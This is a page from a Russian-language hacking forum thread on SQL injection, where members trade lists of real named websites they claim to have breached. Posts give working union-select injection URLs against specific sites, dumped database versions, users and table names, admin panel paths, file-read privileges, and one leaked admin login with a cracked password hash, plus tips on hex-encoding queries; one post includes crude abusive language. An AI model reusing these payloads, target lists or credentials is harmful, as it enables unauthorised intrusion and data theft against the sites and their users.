SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.disasterinfo.mn

    version() = 5.0.22-Debian_0ubuntu6.06-log
    user() = root@localhost
    database() = forum

    смотрим все таблички
    теперь смотрим все базы
    есть хорошие таблички disasterinfo.users, main_data2.admin

    так же есть доступ к mysql.user
    есть права на чтение файлов)
    переходим к таблицам...
    таблица с админами:
    таблица с юзерами :
    админка тут http://www.disasterinfo.mn/admin/

    прекрасная база,для тренировки новичкам)
    спасибо за внимание)
     
    1 person likes this.
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.haers.ru/index.php?page=86&id=-1+union+select+1,2,3,4,5,concat(0x3a3a,login_user,0x3a3a,pass_user),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+haers.user+limit+30,190


    login ->dom0744
    pass ->d6a4f42b2ef93aa0f440ebcfe24a3351 ->fylhtq

    Админится через CP, хер расковырял =((, фурычит load_file, насчет outfile х*й понял.

    Пускай админа отдерет негр, как последнюю девку!
     
    1 person likes this.
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    хватит постить одно и тоже каждый день! :mad:
    http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum.antichat.ru+Activetoy.co.uk+&btnG=Search
     
  4. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    +from+forum.ibf_members
     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Обед подан...еда! =)PR6

    легкий брут не дал резалта..

    Соседей: 149 ;)
     
    1 person likes this.
  6. Buddah

    Buddah New Member

    Joined:
    26 Nov 2007
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    Знакомтесь

    Code:
    http://lotussoft.com.ua
    ребята делают сайты, в портфолио сайты сделанные в 2005 году многие уязвимы, хз может и остальные тоже =)
     
    #6146 Buddah, 6 Aug 2008
    Last edited: 6 Aug 2008
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Nbfet.gov.cn - PR 5
    Wagrowiec.um.gov.pl - PR 4
    4 ветка
    должны быть юзеры..

    Ipirangadonorte.mt.gov.br
    5 ветка..
    /adm

    Cnunirea.licee.edu.ro
    Students.ee.sun.ac.za
    5 ветка, таблы..
    сам форум не нашел (
    юзеры..

    News.ogel.dk
    Grainedepastel-uk.com
    5 ver. tables..
    /dejainscrit.php?prov=index
     
    #6147 sabe, 6 Aug 2008
    Last edited: 8 Aug 2008
  8. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Сайт: www.fergusonhill.co.uk PR=4


    Версия БД 4.1.22-standard

    Есть таблица users
     
    1 person likes this.
  9. barracuda

    barracuda New Member

    Joined:
    21 Aug 2005
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    http://www.kalyx.com/store/insertorderalt.cfm?ItemID=1%20or%201=(SELECT+TOP+1+table_name+FROM+information_schema.tables)--

    dont get countinue :confused: :confused: :confused:
     
    1 person likes this.
  10. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.anavasi.gr PR 4
    version()=5.0.51a-community
    user()=anavasi_ana@localhost
    database()=anavasi_ana
    http://www.aab.org.uk PR 6
    blind sql
    version=3
    http://www.copmed.org.uk PR 5
    version=4
    http://www.zenithcafe.co.uk PR 2
    version=5
    не смог подобрать кол-во полей...
    http://wedc.lboro.ac.uk PR 6
    version=5
    читать файлики нельзя :(
     
    #6150 MirA, 7 Aug 2008
    Last edited: 7 Aug 2008
    3 people like this.
  11. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Люди есть у кого нибуть сайт где можно слово в hex число перевести! А то был оди хороший сайт http://hack-shop.org.ru/tools-code-encode но его жестоко засрали какойто х*йней ! В инете чтото ваще непонятное!!! (ПРИМЕР:Перевести допустим card_user (переводил на хак-туле - бывшем) получалось 0x636172645f75736572 ! ОЧ нужен почти такой же сайт!!!))Ну или чото типа того приписать 0x не сложно)
     
  12. Cmucl

    Cmucl Member

    Joined:
    21 Jun 2008
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    http://k0x.ru/encoder/index.php
     
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Полдник..=)
    1,2,3,4,5,6,7,8

    Dbname:journalism
    User:[email protected]
    Version:5.0.45

    =============================================
    Эта есть в антибояне, но мож кто-то захочет ковырнуть еще раз.
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

    version:4.0.20-debug-debug
    Dbname:mrc
    User:[email protected]

    =============================================
     
    #6153 $n@ke, 7 Aug 2008
    Last edited: 7 Aug 2008
    2 people like this.
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Valgamaa.ee - PR 5
    5 ver. tables
    Canallatino.tv - PR 4
    Pangkalpinang.go.id - PR 3
    Elhacker.org - PR 3
    Elincom.gr
     
    #6154 sabe, 7 Aug 2008
    Last edited: 8 Aug 2008
    3 people like this.
  15. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    www.edu.ru - Российское образование. Федеральный образовательный портал: учреждения, программы, стандарты

     
    3 people like this.
  16. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
     
    1 person likes this.
  17. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    www.sport-moda.ru

    Уязвимость в скрипте показа новостей:

    http://www.sport-moda.ru/news/view_new.php?id=1'

    Колонки:

    http://www.sport-moda.ru/news/view_new.php?id=-286+union+select+1,2,3/*

    Информация о базе:

    u15055
    5.0.45-log
    [email protected]
     
    1 person likes this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    BanQui
    таким способом узнается версия в mssql

    @@version тоже самое что и version() просто для каждой системы свои запросы )

    $p01nt
    жаль нельзя аватарки заливать (
     
    #6158 sabe, 7 Aug 2008
    Last edited: 7 Aug 2008
  19. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    потому что это MSSQL в MSSQL так и узнаётся версия )
     
  20. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.sephiroth.it PR 4
    4 ветка слепая скуль)
    http://www.infn.it если верить гуглу,то PR 8
    и опять blind...
    version=5
    http://www.hvar.is PR 6
    version = 5 blind sql
    http://www.ethics.utoronto.ca PR 5
    version = 3
    всем удачного вечера =) HF & GL
     
    2 people like this.
Thread Status:
Not open for further replies.